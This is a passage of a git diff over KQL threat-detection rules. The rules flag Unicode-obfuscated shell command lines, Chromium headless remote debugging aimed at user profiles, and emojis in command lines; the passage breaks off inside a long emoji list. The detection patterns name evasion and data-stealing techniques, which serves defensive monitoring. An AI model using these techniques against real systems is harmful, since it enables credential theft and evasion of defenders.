"\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and (ProcessVersionInfoOriginalFileName in~ ("Cmd.EXE", "cscript.exe", "PowerShell.EXE", "PowerShell_ISE.EXE", "pwsh.dll", "wscript.exe"))) and (ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ" or ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄" or ProcessCommandLine contains "―" or ProcessCommandLine contains "—" or ProcessCommandLine contains " " or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "¶" or ProcessCommandLine contains "⠀") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql b/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql index e7be3eef..5da0b829 100644 --- a/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql +++ b/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql @@ -1,10 +1,10 @@ -// Title: Potential Data Stealing Via Chromium Headless Debugging -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-23 -// Level: high -// Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.collection, attack.t1185, attack.t1564.003 - -DeviceProcessEvents +// Title: Potential Data Stealing Via Chromium Headless Debugging +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-23 +// Level: high +// Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.collection, attack.t1185, attack.t1564.003 + +DeviceProcessEvents | where ProcessCommandLine contains "--remote-debugging-" and ProcessCommandLine contains "--user-data-dir" and ProcessCommandLine contains "--headless" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql index d840a792..79e8d350 100644 --- a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql @@ -1,10 +1,10 @@ -// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1 -// Author: @Kostastsale, TheDFIRReport -// Date: 2022-12-05 -// Level: high -// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1 +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-12-05 +// Level: high +// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ProcessCommandLine contains "😀" or ProcessCommandLine contains "😃" or ProcessCommandLine contains "😄" or ProcessCommandLine contains "😁" or ProcessCommandLine contains "😆" or ProcessCommandLine contains "😅" or ProcessCommandLine contains "😂" or ProcessCommandLine contains "🤣" or ProcessCommandLine contains "🥲" or ProcessCommandLine contains "🥹" or ProcessCommandLine contains "☺️" or ProcessCommandLine contains "😊" or ProcessCommandLine contains "😇" or ProcessCommandLine contains "🙂" or ProcessCommandLine contains "🙃" or ProcessCommandLine contains "😉" or ProcessCommandLine contains "😌" or ProcessCommandLine contains "😍" or ProcessCommandLine contains "🥰" or ProcessCommandLine contains "😘" or ProcessCommandLine contains "😗" or ProcessCommandLine contains "😙" or ProcessCommandLine contains "😚" or ProcessCommandLine contains "😋" or ProcessCommandLine contains "😛" or ProcessCommandLine contains "😝" or ProcessCommandLine contains "😜" or ProcessCommandLine contains "🤪" or ProcessCommandLine contains "🤨" or ProcessCommandLine contains "🧐" or ProcessCommandLine contains "🤓" or ProcessCommandLine contains "😎" or ProcessCommandLine contains "🥸" or ProcessCommandLine contains "🤩" or ProcessCommandLine contains "🥳" or ProcessCommandLine contains "😏" or ProcessCommandLine contains "😒" or ProcessCommandLine contains "😞" or ProcessCommandLine contains "😔" or ProcessCommandLine contains "😟" or ProcessCommandLine contains "😕" or ProcessCommandLine contains "🙁" or ProcessCommandLine contains "☹️" or ProcessCommandLine contains "😣" or ProcessCommandLine contains "😖" or ProcessCommandLine contains "😫" or ProcessCommandLine contains "😩" or ProcessCommandLine contains "🥺" or ProcessCommandLine contains "😢" or ProcessCommandLine contains "😭" or ProcessCommandLine contains "😮‍💨" or ProcessCommandLine contains "😤" or ProcessCommandLine contains "😠" or ProcessCommandLine contains "😡" or ProcessCommandLine contains "🤬" or ProcessCommandLine contains "🤯" or ProcessCommandLine contains "😳" or ProcessCommandLine contains "🥵" or ProcessCommandLine contains "🥶" or ProcessCommandLine contains "😱" or ProcessCommandLine contains "😨" or ProcessCommandLine contains "😰" or ProcessCommandLine contains "😥" or ProcessCommandLine contains "😓" or ProcessCommandLine contains "🫣" or ProcessCommandLine contains "🤗" or ProcessCommandLine contains "🫡" or ProcessCommandLine contains "🤔" or ProcessCommandLine contains "🫢" or ProcessCommandLine contains "🤭" or ProcessCommandLine contains "🤫" or ProcessCommandLine contains "🤥" or ProcessCommandLine contains "😶" or ProcessCommandLine contains "😶‍🌫️" or ProcessCommandLine contains "😐" or ProcessCommandLine contains "😑" or ProcessCommandLine contains "😬" or ProcessCommandLine contains "🫠" or ProcessCommandLine contains "🙄" or ProcessCommandLine contains "😯" or ProcessCommandLine contains "😦" or ProcessCommandLine contains "😧" or ProcessCommandLine contains "😮" or ProcessCommandLine contains "😲" or ProcessCommandLine contains "🥱" or ProcessCommandLine contains "😴" or ProcessCommandLine contains "🤤" or ProcessCommandLine contains "😪" or ProcessCommandLine contains "😵" or ProcessCommandLine contains "😵‍💫" or ProcessCommandLine contains "🫥" or ProcessCommandLine contains "🤐" or ProcessCommandLine contains "🥴" or ProcessCommandLine contains "🤢" or ProcessCommandLine contains "🤮" or ProcessCommandLine contains "🤧" or ProcessCommandLine contains "😷" or ProcessCommandLine contains "🤒" or ProcessCommandLine contains "🤕" or ProcessCommandLine contains "🤑" or ProcessCommandLine contains "🤠" or ProcessCommandLine contains "😈" or ProcessCommandLine contains "👿" or ProcessCommandLine contains "👹" or ProcessCommandLine contains "👺" or ProcessCommandLine contains "🤡" or ProcessCommandLine contains "💩" or ProcessCommandLine contains "👻" or ProcessCommandLine contains "💀" or ProcessCommandLine contains "☠️" or ProcessCommandLine contains "👽" or ProcessCommandLine contains "👾" or ProcessCommandLine contains "🤖" or ProcessCommandLine contains "🎃" or ProcessCommandLine contains "😺" or ProcessCommandLine contains "😸" or ProcessCommandLine contains "😹" or ProcessCommandLine contains "😻" or ProcessCommandLine contains "😼" or ProcessCommandLine contains "😽" or ProcessCommandLine contains "🙀" or ProcessCommandLine contains "😿" or ProcessCommandLine contains "😾" or ProcessCommandLine contains "👋" or ProcessCommandLine contains "🤚" or ProcessCommandLine contains "🖐" or ProcessCommandLine contains "✋" or ProcessCommandLine contains "🖖" or ProcessCommandLine contains "👌" or ProcessCommandLine contains "🤌" or ProcessCommandLine contains "🤏" or ProcessCommandLine contains "✌️" or ProcessCommandLine contains "🤞" or ProcessCommandLine contains "🫰" or ProcessCommandLine contains "🤟" or ProcessCommandLine contains "🤘" or ProcessCommandLine contains "🤙" or ProcessCommandLine contains "🫵" or ProcessCommandLine contains "🫱" or ProcessCommandLine contains "🫲" or ProcessCommandLine contains "🫳" or ProcessCommandLine contains "🫴" or ProcessCommandLine contains "👈" or ProcessCommandLine contains "👉" or ProcessCommandLine contains "👆" or ProcessCommandLine contains "🖕" or ProcessCommandLine contains "👇" or ProcessCommandLine contains "☝️" or ProcessCommandLine contains "👍" or ProcessCommandLine contains "👎" or ProcessCommandLine contains "✊" or ProcessCommandLine contains "👊" or ProcessCommandLine contains "🤛" or ProcessCommandLine contains "🤜" or ProcessCommandLine contains "👏" or ProcessCommandLine contains "🫶" or ProcessCommandLine contains "🙌" or ProcessCommandLine contains "👐" or ProcessCommandLine contains "🤲" or ProcessCommandLine contains "🤝" or ProcessCommandLine contains "🙏" or ProcessCommandLine contains "✍️" or ProcessCommandLine contains "💪" or ProcessCommandLine contains "🦾" or ProcessCommandLine contains "🦵" or ProcessCommandLine contains "🦿" or ProcessCommandLine contains "🦶" or ProcessCommandLine contains "👣" or ProcessCommandLine contains "👂" or ProcessCommandLine contains "🦻" or ProcessCommandLine contains "👃" or ProcessCommandLine contains "🫀" or ProcessCommandLine contains "🫁" or ProcessCommandLine contains "🧠" or ProcessCommandLine contains "🦷" or ProcessCommandLine contains "🦴" or ProcessCommandLine contains "👀" or ProcessCommandLine contains "👁" or ProcessCommandLine contains "👅" or ProcessCommandLine contains "👄" or ProcessCommandLine contains "🫦" or ProcessCommandLine contains "💋" or ProcessCommandLine contains "🩸" or ProcessCommandLine contains "👶" or ProcessCommandLine contains "👧" or ProcessCommandLine contains "🧒" or ProcessCommandLine contains "👦" or ProcessCommandLine contains "👩" or ProcessCommandLine contains "🧑" or ProcessCommandLine contains "👨" or ProcessCommandLine contains "👩‍🦱" or ProcessCommandLine contains "🧑‍🦱" or ProcessCommandLine contains "👨‍🦱" or ProcessCommandLine contains "👩‍🦰" or ProcessCommandLine contains "🧑‍🦰" or ProcessCommandLine contains "👨‍🦰" or ProcessCommandLine contains "👱‍♀️" or ProcessCommandLine contains "👱" or ProcessCommandLine contains "👱‍♂️" or ProcessCommandLine contains "👩‍🦳" or ProcessCommandLine contains "🧑‍🦳" or ProcessCommandLine contains "👨‍🦳" or ProcessCommandLine contains "👩‍🦲" or ProcessCommandLine contains "🧑‍🦲" or ProcessCommandLine contains "👨‍🦲" or ProcessCommandLine contains "🧔‍♀️" or ProcessCommandLine contains "🧔" or ProcessCommandLine contains "🧔‍♂️" or ProcessCommandLine contains "👵" or ProcessCommandLine contains "🧓" or ProcessCommandLine contains "👴" or ProcessCommandLine contains "👲" or ProcessCommandLine contains "👳‍♀️" or ProcessCommandLine contains "👳" or ProcessCommandLine contains "👳‍♂️" or ProcessCommandLine contains "🧕" or ProcessCommandLine contains "👮‍♀️" or ProcessCommandLine contains "👮" or ProcessCommandLine contains "👮‍♂️" or ProcessCommandLine contains "👷‍♀️" or ProcessCommandLine contains "👷" or ProcessCommandLine contains "👷‍♂️" or ProcessCommandLine contains "💂‍♀️" or ProcessCommandLine contains "💂" or ProcessCommandLine contains "💂‍♂️" or ProcessCommandLine contains "🕵️‍♀️" or ProcessCommandLine contains "🕵️" or ProcessCommandLine contains "🕵️‍♂️" or ProcessCommandLine contains "👩‍⚕️" or ProcessCommandLine contains "🧑‍⚕️" or ProcessCommandLine contains "👨‍⚕️" or ProcessCommandLine contains "👩‍🌾" or ProcessCommandLine contains "🧑‍🌾" or ProcessCommandLine contains "👨‍🌾" or ProcessCommandLine contains "👩‍🍳" or ProcessCommandLine contains "🧑‍🍳" or ProcessCommandLine contains "👨‍🍳" or ProcessCommandLine contains "👩‍🎓" or ProcessCommandLine contains "🧑‍🎓" or ProcessCommandLine contains "👨‍🎓" or ProcessCommandLine contains "👩‍🎤" or ProcessCommandLine contains "🧑‍🎤" or ProcessCommandLine contains "👨‍🎤" or ProcessCommandLine contains "👩‍🏫" or ProcessCommandLine contains "🧑‍🏫" or ProcessCommandLine contains "👨‍🏫" or ProcessCommandLine contains "👩‍🏭" or ProcessCommandLine contains "🧑‍🏭" or ProcessCommandLine contains "👨‍🏭" or ProcessCommandLine contains "👩‍💻" or ProcessCommandLine contains "🧑‍💻" or ProcessCommandLine contains "👨‍💻" or ProcessCommandLine contains "👩‍💼" or ProcessCommandLine contains "🧑‍💼" or ProcessCommandLine contains "👨‍💼" or ProcessCommandLine contains "👩‍🔧" or ProcessCommandLine contains "🧑‍🔧" or ProcessCommandLine contains "👨‍🔧" or ProcessCommandLine contains "👩‍🔬" or ProcessCommandLine contains "🧑‍🔬" or ProcessCommandLine contains "👨‍🔬" or ProcessCommandLine contains "👩‍🎨" or ProcessCommandLine contains "🧑‍🎨" or ProcessCommandLine contains "👨‍🎨" or ProcessCommandLine contains "👩‍🚒" or ProcessCommandLine contains "🧑‍🚒" or ProcessCommandLine contains "👨‍🚒" or ProcessCommandLine contains "👩‍✈️" or ProcessCommandLine contains "🧑‍✈️" or ProcessCommandLine contains "👨‍✈️" or ProcessCommandLine contains "👩‍🚀" or ProcessCommandLine contains "🧑‍🚀" or ProcessCommandLine contains "👨‍🚀" or ProcessCommandLine contains "👩‍⚖️" or ProcessCommandLine contains "🧑‍⚖️" or ProcessCommandLine contains "👨‍⚖️" or ProcessCommandLine contains "👰‍♀️" or ProcessCommandLine contains "👰" or ProcessCommandLine contains "👰‍♂️" or ProcessCommandLine contains "🤵‍♀️" or ProcessCommandLine contains "🤵" or ProcessCommandLine contains "🤵‍♂️" or ProcessCommandLine contains "👸" or ProcessCommandLine contains "🫅" or ProcessCommandLine contains "🤴" or ProcessCommandLine contains "🥷" or ProcessCommandLine contains "🦸‍♀️" or ProcessCommandLine contains "🦸" or ProcessCommandLine contains "🦸‍♂️" or ProcessCommandLine contains "🦹‍♀️" or ProcessCommandLine contains "🦹" or ProcessCommandLine contains "🦹‍♂️" or ProcessCommandLine contains "🤶" or ProcessCommandLine contains "🧑‍🎄" or ProcessCommandLine contains "🎅" or ProcessCommandLine contains "🧙‍♀️" or ProcessCommandLine contains "🧙" or ProcessCommandLine contains "🧙‍♂️" or ProcessCommandLine contains "🧝‍♀️" or ProcessCommandLine contains "🧝" or ProcessCommandLine contains "🧝‍♂️" or ProcessCommandLine contains "🧛‍♀️" or ProcessCommandLine contains "🧛" or ProcessCommandLine contains "🧛‍♂️" or ProcessCommandLine contains "🧟‍♀️" or ProcessCommandLine contains "🧟" or ProcessCommandLine contains "🧟‍♂️" or ProcessCommandLine contains "🧞‍♀️" or ProcessCommandLine contains "🧞" or ProcessCommandLine contains "🧞‍♂️" or ProcessCommandLine contains "🧜‍♀️" or ProcessCommandLine contains "🧜" or ProcessCommandLine contains "🧜‍♂️" or ProcessCommandLine contains "🧚‍♀️" or ProcessCommandLine contains "🧚" or ProcessCommandLine contains "🧚‍♂️" or ProcessCommandLine contains "🧌" or ProcessCommandLine contains "👼" or ProcessCommandLine contains "🤰" or ProcessCommandLine contains "🫄" or ProcessCommandLine contains "🫃" or ProcessCommandLine contains "🤱" or ProcessCommandLine contains "👩‍🍼" or ProcessCommandLine contains "🧑‍🍼" or ProcessCommandLine contains "👨‍🍼" or ProcessCommandLine contains "🙇‍♀️" or ProcessCommandLine contains "🙇" or ProcessCommandLine contains "🙇‍♂️" or ProcessCommandLine contains "💁‍♀️" or ProcessCommandLine contains "💁" or ProcessCommandLine contains "💁‍♂️" or ProcessCommandLine contains "🙅‍♀️" or ProcessCommandLine contains "🙅" or ProcessCommandLine contains "🙅‍♂️" or ProcessCommandLine contains "🙆‍♀️" or ProcessCommandLine contains "🙆" or ProcessCommandLine contains "🙆‍♂️" or ProcessCommandLine contains "🙋‍♀️" or ProcessCommandLine contains "🙋" or ProcessCommandLine contains "🙋‍♂️" or ProcessCommandLine contains "🧏‍♀️" or ProcessCommandLine contains "🧏" or ProcessCommandLine contains "🧏‍♂️" or ProcessCommandLine contains "🤦‍♀️" or ProcessCommandLine contains "🤦" or ProcessCommandLine contains "🤦‍♂️" or ProcessCommandLine contains "🤷‍♀️" or ProcessCommandLine contains "🤷" or ProcessCommandLine contains "🤷‍♂️" or ProcessCommandLine contains "🙎‍♀️" or ProcessCommandLine contains "🙎" or ProcessCommandLine contains "🙎‍♂️" or ProcessCommandLine contains "🙍‍♀️" or ProcessCommandLine contains "🙍" or ProcessCommandLine contains "🙍‍♂️" or ProcessCommandLine contains "💇‍♀️" or ProcessCommandLine contains "💇" or ProcessCommandLine contains "💇‍♂️" or ProcessCommandLine contains "💆‍♀️" or ProcessCommandLine contains "💆" or ProcessCommandLine contains "💆‍♂️" or ProcessCommandLine contains "🧖‍♀️" or ProcessCommandLine contains "🧖" or ProcessCommandLine contains "🧖‍♂️" or ProcessCommandLine contains "💅" or ProcessCommandLine contains "💃" or ProcessCommandLine contains "🕺" or ProcessCommandLine contains "👯‍♀️" or ProcessCommandLine contains "👯" or ProcessCommandLine contains "👯‍♂️" or ProcessCommandLine contains "🕴" or ProcessCommandLine contains "👩‍🦽" or ProcessCommandLine contains "🧑‍🦽" or ProcessCommandLine contains "👨‍🦽" or ProcessCommandLine contains "👩‍🦼" or ProcessCommandLine contains "🧑‍🦼" or ProcessCommandLine contains "👨‍🦼" or ProcessCommandLine contains "🚶‍♀️" or ProcessCommandLine contains "🚶" or ProcessCommandLine contains "🚶‍♂️" or ProcessCommandLine contains "👩‍🦯" or ProcessCommandLine contains "🧑‍🦯" or ProcessCommandLine contains "👨‍🦯" or ProcessCommandLine contains "🧎‍♀️" or ProcessCommandLine contains "🧎" or ProcessCommandLine contains "🧎‍♂️" or ProcessCommandLine contains "🏃‍♀️" or ProcessCommandLine contains "🏃" or ProcessCommandLine contains "🏃‍♂️" or ProcessCommandLine contains "🧍‍♀️" or ProcessCommandLine contains "🧍" or ProcessCommandLine contains "🧍‍♂️" or ProcessCommandLine contains "👭" or ProcessCommandLine contains "🧑‍🤝‍🧑" or ProcessCommandLine contains "👬" or ProcessCommandLine contains "👫" or ProcessCommandLine contains "👩‍❤️‍👩" or ProcessCommandLine contains "💑" or ProcessCommandLine contains "👨‍❤️‍👨" or ProcessCommandLine contains "👩‍❤️‍👨" or ProcessCommandLine contains "👩‍❤️‍💋‍👩" or ProcessCommandLine contains "💏" or ProcessCommandLine contains "👨‍❤️‍💋‍👨" or ProcessCommandLine contains "👩‍❤️‍💋‍👨" or ProcessCommandLine contains "👪" or ProcessCommandLine contains "👨‍👩‍👦" or ProcessCommandLine contains "👨‍👩‍👧" or ProcessCommandLine contains "👨‍👩‍👧‍👦" or ProcessCommandLine contains "👨‍👩‍👦‍👦" or ProcessCommandLine contains "👨‍👩‍👧‍👧" or ProcessCommandLine contains "👨‍👨‍👦" or ProcessCommandLine contains "👨‍👨‍👧" or ProcessCommandLine contains "👨‍👨‍👧‍👦" or ProcessCommandLine contains "👨‍👨‍👦‍👦" or ProcessCommandLine contains "👨‍👨‍👧‍👧" or ProcessCommandLine contains "👩‍👩‍👦" or ProcessCommandLine contains "👩‍👩‍👧" or ProcessCommandLine contains "👩‍👩‍👧‍👦" or ProcessCommandLine contains "👩‍👩‍👦‍👦" or ProcessCommandLine contains "👩‍👩‍👧‍👧" or ProcessCommandLine contains "👨‍👦" or ProcessCommandLine contains "👨‍👦‍👦" or ProcessCommandLine contains "👨‍👧" or ProcessCommandLine contains "👨‍👧‍👦" or ProcessCommandLine contains "👨‍👧‍👧" or ProcessCommandLine contains "👩‍👦" or ProcessCommandLine contains "👩‍👦‍👦" or ProcessCommandLine contains "👩‍👧" or ProcessCommandLine contains "👩‍👧‍👦" or ProcessCommandLine contains "👩‍👧‍👧" or ProcessCommandLine contains "🗣" or ProcessCommandLine contains "👤" or ProcessCommandLine contains "👥" or ProcessCommandLine contains "🫂" or ProcessCommandLine contains "🧳" or ProcessCommandLine contains "🌂" or ProcessCommandLine contains "☂️" or ProcessCommandLine contains "🧵" or ProcessCommandLine contains "🪡" or ProcessCommandLine contains "🪢" or ProcessCommandLine contains "🧶" or ProcessCommandLine contains "👓" or ProcessCommandLine contains "🕶" or ProcessCommandLine contains "🥽" or ProcessCommandLine contains "🥼" or ProcessCommandLine contains "🦺" or ProcessCommandLine contains "👔" or ProcessCommandLine contains "👕" or ProcessCommandLine contains "👖" or ProcessCommandLine contains "🧣" or ProcessCommandLine contains "🧤" or ProcessCommandLine contains "🧥" or ProcessCommandLine contains "🧦" or ProcessCommandLine contains "👗" or ProcessCommandLine contains "👘" or ProcessCommandLine contains "🥻" or ProcessCommandLine contains "🩴" or ProcessCommandLine contains "🩱" or ProcessCommandLine contains "🩲" or ProcessCommandLine contains "🩳" or ProcessCommandLine contains "👙" or ProcessCommandLine contains "👚" or ProcessCommandLine contains "👛" or ProcessCommandLine contains "👜" or ProcessCommandLine contains "👝" or ProcessCommandLine contains "🎒" or ProcessCommandLine contains "👞" or ProcessCommandLine contains "👟" or ProcessCommandLine contains "🥾" or ProcessCommandLine contains "🥿" or ProcessCommandLine contains "👠" or ProcessCommandLine contains "👡" or ProcessCommandLine contains "🩰" or ProcessCommandLine contains "👢" or ProcessCommandLine contains "👑" or ProcessCommandLine contains "👒" or ProcessCommandLine contains "🎩" or ProcessCommandLine contains "🎓" or ProcessCommandLine contains "🧢" or ProcessCommandLine contains "⛑" or ProcessCommandLine contains "🪖" or ProcessCommandLine contains "💄" or ProcessCommandLine contains "💍" or ProcessCommandLine contains "💼" or ProcessCommandLine contains "👋🏻" or ProcessCommandLine contains "🤚🏻" or ProcessCommandLine contains "🖐🏻" or ProcessCommandLine contains "✋🏻" or ProcessCommandLine contains "🖖🏻" or ProcessCommandLine contains "👌🏻" or ProcessCommandLine contains "🤌🏻" or ProcessCommandLine contains "🤏🏻" or ProcessCommandLine contains "✌🏻" or ProcessCommandLine contains "🤞🏻" or ProcessCommandLine contains "🫰🏻" or ProcessCommandLine contains "🤟🏻" or ProcessCommandLine contains "🤘🏻" or ProcessCommandLine contains "🤙🏻" or ProcessCommandLine contains "🫵🏻" or ProcessCommandLine contains "🫱🏻" or ProcessCommandLine contains "🫲🏻" or ProcessCommandLine contains "🫳🏻" or ProcessCommandLine contains "🫴🏻" or ProcessCommandLine contains "👈🏻" or ProcessCommandLine contains "👉🏻" or ProcessCommandLine contains "👆🏻" or ProcessCommandLine contains "🖕🏻" or ProcessCommandLine contains "👇🏻" or ProcessCommandLine contains "☝🏻" or ProcessCommandLine contains "👍🏻" or ProcessCommandLine contains "👎🏻" or ProcessCommandLine contains "✊🏻" or ProcessCommandLine contains "👊🏻" or ProcessCommandLine contains "🤛🏻" or ProcessCommandLine contains "🤜🏻" or ProcessCommandLine contains "👏🏻" or ProcessCommandLine contains "🫶🏻" or ProcessCommandLine contains "🙌🏻" or ProcessCommandLine contains "👐🏻" or ProcessCommandLine contains "🤲🏻" or ProcessCommandLine contains "🙏🏻" or ProcessCommandLine contains "✍🏻" or ProcessCommandLine contains "💪🏻" or ProcessCommandLine contains "🦵🏻" or ProcessCommandLine contains "🦶🏻" or ProcessCommandLine contains "👂🏻" or ProcessCommandLine contains "🦻🏻" or ProcessCommandLine contains "👃🏻" or ProcessCommandLine contains "👶🏻" or ProcessCommandLine contains "👧🏻" or ProcessCommandLine contains "🧒🏻" or ProcessCommandLine contains "👦🏻" or ProcessCommandLine contains "👩🏻" or ProcessCommandLine contains "🧑🏻" or ProcessCommandLine contains "👨🏻" or ProcessCommandLine contains "👩🏻‍🦱" or ProcessCommandLine contains "🧑🏻‍🦱" or ProcessCommandLine contains "👨🏻‍🦱" or ProcessCommandLine contains "👩🏻‍🦰" or ProcessCommandLine contains "🧑🏻‍🦰" or ProcessCommandLine contains "👨🏻‍🦰" or ProcessCommandLine contains "👱🏻‍♀️" or ProcessCommandLine contains "👱🏻" or ProcessCommandLine contains "👱🏻‍♂️" or ProcessCommandLine contains "👩🏻‍🦳" or ProcessCommandLine contains "🧑🏻‍🦳" or ProcessCommandLine contains "👨🏻‍🦳" or ProcessCommandLine contains "👩🏻‍🦲" or ProcessCommandLine contains "🧑🏻‍🦲" or ProcessCommandLine contains "👨🏻‍🦲" or ProcessCommandLine contains "🧔🏻‍♀️" or ProcessCommandLine contains "🧔🏻" or ProcessCommandLine contains "🧔🏻‍♂️" or ProcessCommandLine contains "👵🏻" or ProcessCommandLine contains "🧓🏻" or ProcessCommandLine contains "👴🏻" or ProcessCommandLine contains "👲🏻" or ProcessCommandLine contains "👳🏻‍♀️" or ProcessCommandLine contains "👳🏻" or ProcessCommandLine contains "👳🏻‍♂️" or ProcessCommandLine contains "🧕🏻" or ProcessCommandLine contains "👮🏻‍♀️" or ProcessCommandLine contains "👮🏻" or ProcessCommandLine contains "👮🏻‍♂️" or ProcessCommandLine contains "👷🏻‍♀️" or ProcessCommandLine contains "👷🏻" or ProcessCommandLine contains "👷🏻‍♂️" or ProcessCommandLine contains "💂🏻‍♀️" or ProcessCommandLine contains "💂🏻" or ProcessCommandLine contains "💂🏻‍♂️" or ProcessCommandLine contains "🕵🏻‍♀️" or ProcessCommandLine contains "🕵🏻" or ProcessCommandLine contains "🕵🏻‍♂️" or ProcessCommandLine contains "👩🏻‍⚕️" or ProcessCommandLine contains "🧑🏻‍⚕️" or ProcessCommandLine contains "👨🏻‍⚕️" or ProcessCommandLine contains "👩🏻‍🌾" or ProcessCommandLine contains "🧑🏻‍🌾" or ProcessCommandLine contains "👨🏻‍🌾" or ProcessCommandLine contains "👩🏻‍🍳" or ProcessCommandLine contains "🧑🏻‍🍳" or ProcessCommandLine contains "👨🏻‍🍳" or ProcessCommandLine contains "👩🏻‍🎓" or ProcessCommandLine contains "🧑🏻‍🎓" or ProcessCommandLine contains "👨🏻‍🎓" or ProcessCommandLine contains "👩🏻‍🎤" or ProcessCommandLine contains "🧑🏻‍🎤" or ProcessCommandLine contains "👨🏻‍🎤" or ProcessCommandLine contains "👩🏻‍🏫" or ProcessCommandLine contains "🧑🏻‍🏫" or ProcessCommandLine contains "👨🏻‍🏫" or ProcessCommandLine contains "👩🏻‍🏭" or ProcessCommandLine contains "🧑🏻‍🏭" or ProcessCommandLine contains "👨🏻‍🏭" or ProcessCommandLine contains "👩🏻‍💻" or ProcessCommandLine contains "🧑🏻‍💻" or ProcessCommandLine contains "👨🏻‍💻" or ProcessCommandLine contains "👩🏻‍💼" or ProcessCommandLine contains "🧑🏻‍💼" or ProcessCommandLine contains "👨🏻‍💼" or ProcessCommandLine contains "👩🏻‍🔧" or ProcessCommandLine contains "🧑🏻‍🔧" or ProcessCommandLine contains "👨🏻‍🔧" or ProcessCommandLine contains "👩🏻‍🔬" or ProcessCommandLine contains "🧑🏻‍🔬" or ProcessCommandLine contains "👨🏻‍🔬" or ProcessCommandLine contains "👩🏻‍🎨" or ProcessCommandLine contains "🧑🏻‍🎨" or ProcessCommandLine contains "👨🏻‍🎨" or ProcessCommandLine contains "👩🏻‍🚒" or ProcessCommandLine contains "🧑🏻‍🚒" or ProcessCommandLine contains "👨🏻‍🚒" or ProcessCommandLine contains "👩🏻‍✈️" or ProcessCommandLine contains "🧑🏻‍✈️" or ProcessCommandLine contains "👨🏻‍✈️" or ProcessCommandLine contains "👩🏻‍🚀" or ProcessCommandLine contains "🧑🏻‍🚀" or ProcessCommandLine contains "👨🏻‍🚀" or ProcessCommandLine contains "👩🏻‍⚖️" or ProcessCommandLine contains "🧑🏻‍⚖️" or ProcessCommandLine contains "👨🏻‍⚖️" or ProcessCommandLine contains "👰🏻‍♀️" or ProcessCommandLine contains "👰🏻" or ProcessCommandLine contains "👰🏻‍♂️" or ProcessCommandLine contains "🤵🏻‍♀️" or ProcessCommandLine contains "🤵🏻" or ProcessCommandLine contains "🤵🏻‍♂️" or ProcessCommandLine contains "👸🏻" or ProcessCommandLine contains "🫅🏻" or ProcessCommandLine contains "🤴🏻" or ProcessCommandLine contains "🥷🏻" or ProcessCommandLine contains "🦸🏻‍♀️" or ProcessCommandLine contains "🦸🏻" or ProcessCommandLine contains "🦸🏻‍♂️" or ProcessCommandLine contains "🦹🏻‍♀️" or ProcessCommandLine contains "🦹🏻" or ProcessCommandLine contains "🦹🏻‍♂️" or ProcessCommandLine contains "🤶🏻" or ProcessCommandLine contains "🧑🏻‍🎄" or ProcessCommandLine contains "🎅🏻" or ProcessCommandLine contains "🧙🏻‍♀️" or ProcessCommandLine contains "🧙🏻" or ProcessCommandLine contains "🧙🏻‍♂️" or ProcessCommandLine contains "🧝🏻‍♀️" or ProcessCommandLine contains "🧝🏻" or ProcessCommandLine contains "🧝🏻‍♂️" or ProcessCommandLine contains "🧛🏻‍♀️" or ProcessCommandLine contains "🧛🏻" or ProcessCommandLine contains "🧛🏻‍♂️" or ProcessCommandLine contains "🧜🏻‍♀️" or ProcessCommandLine contains "🧜🏻" or ProcessCommandLine contains "🧜🏻‍♂️" or ProcessCommandLine contains "🧚🏻‍♀️" or ProcessCommandLine contains "🧚🏻" or ProcessCommandLine contains "🧚🏻‍♂️" or ProcessCommandLine contains "👼🏻" or ProcessCommandLine contains "🤰🏻" or ProcessCommandLine contains "🫄🏻" or ProcessCommandLine contains "🫃🏻" or ProcessCommandLine contains "🤱🏻" or ProcessCommandLine contains "👩🏻‍🍼" or ProcessCommandLine contains "🧑🏻‍🍼" or ProcessCommandLine contains "👨🏻‍🍼" or ProcessCommandLine contains "🙇🏻‍♀️" or ProcessCommandLine contains "🙇🏻" or ProcessCommandLine contains "🙇🏻‍♂️" or ProcessCommandLine contains "💁🏻‍♀️" or ProcessCommandLine contains "💁🏻" or ProcessCommandLine contains "💁🏻‍♂️" or ProcessCommandLine contains "🙅🏻‍♀️" or ProcessCommandLine contains "🙅🏻" or ProcessCommandLine contains "🙅🏻‍♂️" or ProcessCommandLine contains "🙆🏻‍♀️" or ProcessCommandLine contains "🙆🏻" or ProcessCommandLine contains "🙆🏻‍♂️" or ProcessCommandLine contains "🙋🏻‍♀️" or ProcessCommandLine contains "🙋🏻" or ProcessCommandLine contains "🙋🏻‍♂️" or ProcessCommandLine contains "🧏🏻‍♀️" or ProcessCommandLine contains "🧏🏻" or ProcessCommandLine contains "🧏🏻‍♂️" or ProcessCommandLine contains "🤦🏻‍♀️" or ProcessCommandLine contains 